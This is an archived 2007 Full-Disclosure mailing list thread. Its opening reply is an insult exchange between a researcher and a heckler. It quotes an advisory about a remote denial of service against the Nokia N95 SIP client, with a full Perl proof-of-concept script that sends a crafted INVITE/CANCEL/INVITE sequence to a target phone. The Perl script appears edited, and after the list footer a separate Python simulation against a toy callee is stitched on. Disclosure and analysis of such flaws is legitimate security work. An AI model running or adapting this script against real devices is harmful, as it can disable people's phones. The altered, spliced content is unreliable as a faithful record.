lists.openwall.net: Open Source and information security mailing list archives
Date: Wed,  5 Dec 2007 20:57:13 +0100
From: state@...ia.fr
To: reepex <reepex@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Nokia N95 cellphone remote DoS using the SIP Stack

hi Reepex,

I do not understand why you are frustrated about a computer science degree. Maybe
someone got dropped out of a degree program and some psychological trauma gets
activated when seeing a Ph.D?

Whether you like it or not, in order to get a computer science degree, you will have
to take classes, and most classes are taught by Ph.Ds.

I will not argue with you on why I use the Ph.D in my signature, but if you
really want to know, look at our research papers published in academic
journals/conferences. (If you do not find them, I can send them to you.)
If you ever understand the contents, then you will understand what our
credentials are. :) This will probably never happen.

At least, I use a signature and a real name and do not hide behind a gmail
account.

Meanwhile try yourself to find at least one vulnerability and enjoy Perl
programming; it seems your computer science skills are somehow in this area :)


Greetings

RS


reepex <reepex@...il.com> wrote:

> So almighty Phd what is your thesis exactly?
>
> To me it seems to be 'how to run a fuzzer then write crappy perl scripts
> to exploit DoS conditions'
>
> does this properly summarize your phd credentials?
>
> I guess you could tack on 'after writing the crappy scripts, flood mailing
> lists with our crap, and get made fun of'
>
> I am sure you will serve the academic community great one day when you teach
> "hacking" classes revolving around the latest editions of hacking exposed
>
>
> On Dec 5, 2007 11:05 AM, Radu State <State@...ia.fr> wrote:
>
> > Nokia N95 cellphone remote DoS using the SIP Stack
> >
> > Severity:
> > High – Denial of Service
> >
> > Hardware:
> > Nokia N95
> >
> > Firmware:
> > Tested version: Nokia RM-159 V 12.0.013
> >
> > Notification:
> > Vulnerability found: 11 September 2007
> > Contact Nokia Support: 12 September 2007 / no reply
> > Contact Nokia Security Support: 19 September 2007 / no reply
> >
> > Vulnerability Synopsis:
> > If the device has the SIP Phone client activated, a sequence of SIP
> > messages turns the device into an inconsistent state where the user is not
> > able to operate it anymore until it reboots.
> >
> > The sequence of messages consists of 2 different SIP Dialogs, where the
> > first initiates an INVITE transaction but immediately closes it (in an
> > anticipated manner), while the second initiates a normal INVITE
> > transaction that triggers the vulnerability of the target.
> >
> > The sequence of messages is illustrated below.
> >
> > X ------------------------- INVITE -----------------------> Nokiav12
> > X <---------------------- 100 Trying ---------------------- Nokiav12
> > X ------------------------- CANCEL -----------------------> Nokiav12
> > X <----------------- OK (to the Cancel) ------------------- Nokiav12
> > X <---------------- 487 Request Terminated ---------------- Nokiav12
> >
> > --------New Dialog--------
> >
> > X ------------------------- INVITE -----------------------> Nokiav12
> > X <---------------------- 100 Trying ---------------------- Nokiav12
> > X <---------------------- 180 Trying ---------------------- Nokiav12
> >
> > ---- The device does not work properly anymore ----
> >
> > Impact:
> > A remote entity can take down all the services of the cell phone
> >
> > Resolution:
> > As we did not get any proper reply from Nokia about the subject, the best
> > way will be to disable the SIP Client
> >
> > Credits:
> > Humberto J. Abdelnur (Ph.D Student)
> > Radu State (Ph.D)
> > Olivier Festor (Ph.D)
> >
> > This vulnerability was identified by the Madynes research team at INRIA
> > Lorraine, using KiF, the Madynes VoIP fuzzer.
> > http://madynes.loria.fr/
> >
> > Proof of Concept:
> > A perl script (nokiav12.pl) is attached to this mail. Before launching
> > it, the SIP phone has to be initialized in the target device.
> >
> > Command:
> > perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>
> >
> > Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu
> >
> > #!/usr/bin/perl
> > ##################################################
> > # Vulnerability discovered using KiF ~ Kiph      #
> > #                                                #
> > # Authors:                                       #
> > #   Humberto J. Abdelnur (Ph.D Student)          #
> > #   Radu State (Ph.D)                            #
> > #   Olivier Festor (Ph.D)                        #
> > #                                                #
> > # Madynes Team, LORIA - INRIA Lorraine           #
> > # http://madynes.loria.fr                        #
> > ##################################################
> >
> > use strict;
> > use warnings;
> > use IO::Socket::INET;
> > use String::Random;
> >
> > die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>\n"
> >     unless ($ARGV[3]);
> >
> > my $targetIP     = $ARGV[0];
> > my $targetUser   = $ARGV[1];
> > my $attackerIP   = $ARGV[2];
> > my $attackerUser = $ARGV[3];
> >
> > # One UDP socket bound to 5060, so the device's responses come back here.
> > my $socket = IO::Socket::INET->new(
> >     Proto     => 'udp',
> >     PeerPort  => 5060,
> >     PeerAddr  => $targetIP,
> >     LocalPort => 5060,
> > ) or die "socket: $@";
> >
> > my $foo    = String::Random->new;
> > my $callid = $foo->randpattern("CCccnCn");
> > my $cseq   = $foo->randregex('\d\d\d\d');
> >
> > # SDP offer. Each line ends in "\r" plus the literal newline, i.e. CRLF on the wire.
> > my $sdp = "v=0\r
> > o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
> > s=-\r
> > c=IN IP4 $attackerIP\r
> > t=0 0\r
> > m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
> > a=sendrecv\r
> > a=ptime:20\r
> > a=maxptime:200\r
> > a=fmtp:96 mode-change-neighbor=1\r
> > a=fmtp:18 annexb=no\r
> > a=fmtp:98 0-15\r
> > a=rtpmap:96 AMR/8000/1\r
> > a=rtpmap:0 PCMU/8000/1\r
> > a=rtpmap:8 PCMA/8000/1\r
> > a=rtpmap:97 iLBC/8000/1\r
> > a=rtpmap:18 G729/8000/1\r
> > a=rtpmap:98 telephone-event/8000/1\r
> > a=rtpmap:13 CN/8000/1\r
> > ";
> > my $sdplen = length $sdp;
> >
> > # Dialog 1: INVITE, wait for 100 Trying, then CANCEL the same transaction.
> > my $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> > From: <sip:$attackerUser\@$attackerIP>;tag=1\r
> > To: <sip:$targetUser\@$targetIP>\r
> > Call-ID: $callid\@$attackerIP\r
> > CSeq: $cseq INVITE\r
> > Max-Forwards: 70\r
> > Contact: <sip:$attackerUser\@$attackerIP>\r
> > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
> > Content-Type: application/sdp\r
> > Content-Length: $sdplen\r
> > \r
> > $sdp";
> > $socket->send($msg);
> >
> > # Block until the device answers 100 Trying; any other datagram is discarded.
> > my $text = '';
> > while ($text !~ /^SIP\/2\.0 100/) {
> >     $socket->recv($text, 1024, 0);
> > }
> >
> > # The CANCEL matches the INVITE transaction by Via branch, Call-ID, From tag
> > # and CSeq number. The To tag is kept as in the posted PoC; RFC 3261 9.1
> > # would copy the INVITE's tag-less To header unchanged.
> > $msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> > From: <sip:$attackerUser\@$attackerIP>;tag=1\r
> > To: <sip:$targetUser\@$targetIP>;tag=1\r
> > Call-ID: $callid\@$attackerIP\r
> > CSeq: $cseq CANCEL\r
> > Max-Forwards: 70\r
> > Content-Length: 0\r
> > \r
> > ";
> > $socket->send($msg);
> > sleep 1;
> >
> > # Dialog 2: fresh Call-ID, branch and From tag; a normal INVITE that is
> > # left to ring.
> > $callid = $foo->randpattern("CCccnCn");
> > $cseq   = $foo->randregex('\d\d\d\d');
> > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
> > From: <sip:$attackerUser\@$attackerIP>;tag=2\r
> > To: <sip:$targetUser\@$targetIP>\r
> > Call-ID: $callid\@$attackerIP\r
> > CSeq: $cseq INVITE\r
> > Contact: <sip:$attackerUser\@$attackerIP>\r
> > Max-Forwards: 70\r
> > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
> > Content-Type: application/sdp\r
> > Content-Length: $sdplen\r
> > \r
> > $sdp";
> > $socket->send($msg);
>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
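The two-dialog exchange in the quoted advisory, re-enacted offline so that both sides of the conversation can be inspected. This is an added example and not the posted nokiav12.pl: the ToyUAS class is a hypothetical, minimal callee written for this example following the RFC 3261 transaction-matching rules (Via branch, Call-ID, From tag, CSeq number), not the Nokia SIP stack, so it answers the way a conforming peer would and does not reproduce the hang. The user names and addresses are the advisory's sample values; the SDP body is a constructed one-codec offer.

```python
import secrets

CRLF = "\r\n"


def sdp_body(src_ip):
    """Minimal SDP offer (constructed for this example)."""
    return CRLF.join(["v=0", f"o=ex 1 1 IN IP4 {src_ip}", "s=-",
                      f"c=IN IP4 {src_ip}", "t=0 0",
                      "m=audio 49152 RTP/AVP 0", "a=rtpmap:0 PCMU/8000"]) + CRLF


def build_request(method, tgt_user, tgt_ip, src_user, src_ip,
                  call_id, cseq_num, branch, from_tag, body=""):
    """RFC 3261 9.1: a CANCEL carries the INVITE's Request-URI, Call-ID, From
    (tag included), To, CSeq number and top Via branch; only the CSeq method
    differs.  Passing the INVITE's values unchanged gives exactly that."""
    lines = [f"{method} sip:{tgt_user}@{tgt_ip} SIP/2.0",
             f"Via: SIP/2.0/UDP {src_ip};branch={branch}",
             f"From: <sip:{src_user}@{src_ip}>;tag={from_tag}",
             f"To: <sip:{tgt_user}@{tgt_ip}>",
             f"Call-ID: {call_id}@{src_ip}",
             f"CSeq: {cseq_num} {method}",
             "Max-Forwards: 70"]
    if body:
        lines.append("Content-Type: application/sdp")
    lines += [f"Content-Length: {len(body.encode())}", "", body]
    return CRLF.join(lines)


def parse_sip(raw):
    """(start line, lowercased header dict, body); the body is cut at
    Content-Length rather than trusting the datagram boundary."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines, hdrs = head.split(CRLF), {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        hdrs[name.strip().lower()] = value.strip()
    return lines[0], hdrs, body[:int(hdrs.get("content-length", "0"))]


def status_code(raw):
    return int(parse_sip(raw)[0].split()[1])


def txn_key(hdrs):
    """Server-transaction key (RFC 3261 17.2.3).  A well-formed CANCEL
    lands on the key of the INVITE it cancels."""
    branch = next((p[7:] for p in hdrs["via"].split(";") if p.startswith("branch=")), "")
    from_tag = hdrs["from"].partition("tag=")[2].split(";")[0]
    return (branch, hdrs["call-id"], from_tag, hdrs["cseq"].split()[0])


def response(code, reason, req, to_tag=None):
    """Mirror Via/From/To/Call-ID/CSeq of the request; add a To tag only
    when the request had none (100 Trying is sent without one)."""
    to = req["to"] + (f";tag={to_tag}" if to_tag and "tag=" not in req["to"] else "")
    return CRLF.join([f"SIP/2.0 {code} {reason}", f"Via: {req['via']}",
                      f"From: {req['from']}", f"To: {to}",
                      f"Call-ID: {req['call-id']}", f"CSeq: {req['cseq']}",
                      "Content-Length: 0", "", ""])


class ToyUAS:
    """Hypothetical callee: INVITE -> 100 Trying at once, 180 Ringing on
    ring(); CANCEL -> 200 OK to the CANCEL plus 487 to the matching INVITE,
    or 481 when no INVITE transaction matches."""

    def __init__(self):
        self.pending = {}                  # txn_key -> INVITE headers
        self.to_tag = secrets.token_hex(4)

    def handle(self, raw):
        start, h, _ = parse_sip(raw)
        method, key = start.split()[0], txn_key(h)
        if method == "INVITE":
            self.pending[key] = h
            return [response(100, "Trying", h)]
        if method == "CANCEL":
            inv = self.pending.pop(key, None)
            if inv is None:
                return [response(481, "Call/Transaction Does Not Exist", h)]
            return [response(200, "OK", h),
                    response(487, "Request Terminated", inv, self.to_tag)]
        return [response(405, "Method Not Allowed", h)]

    def ring(self):
        return [response(180, "Ringing", h, self.to_tag) for h in self.pending.values()]


def run_advisory_sequence(tgt_user="lupilu", tgt_ip="192.168.1.119",
                          src_user="tucu", src_ip="192.168.1.2"):
    """Drive the advisory's two dialogs and return the status codes seen."""
    uas, seen, args = ToyUAS(), [], (tgt_user, tgt_ip, src_user, src_ip)
    # Dialog 1: INVITE, then CANCEL as soon as 100 Trying has arrived.
    cid, branch = secrets.token_hex(6), "z9hG4bK" + secrets.token_hex(4)
    seen += map(status_code, uas.handle(build_request("INVITE", *args, cid, 1, branch, "1", sdp_body(src_ip))))
    seen += map(status_code, uas.handle(build_request("CANCEL", *args, cid, 1, branch, "1")))
    # Dialog 2: fresh Call-ID, branch and From tag; this INVITE is left to ring.
    cid, branch = secrets.token_hex(6), "z9hG4bK" + secrets.token_hex(4)
    seen += map(status_code, uas.handle(build_request("INVITE", *args, cid, 1, branch, "2", sdp_body(src_ip))))
    seen += map(status_code, uas.ring())
    return seen                            # [100, 200, 487, 100, 180]
```

The toy callee is also a convenient place to see why the PoC's CANCEL works at all: it reuses the INVITE's branch, Call-ID, From tag and CSeq number, so it hits the pending INVITE transaction and earns a 200 plus a 487. Change the branch and the same CANCEL draws a 481 instead, which is the check a SIP stack should perform before touching any dialog state.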
